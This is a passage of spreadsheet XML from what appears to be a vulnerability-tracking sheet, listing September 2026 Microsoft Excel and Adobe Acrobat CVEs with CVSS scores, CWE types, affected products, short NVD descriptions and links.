      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr">
        <is>
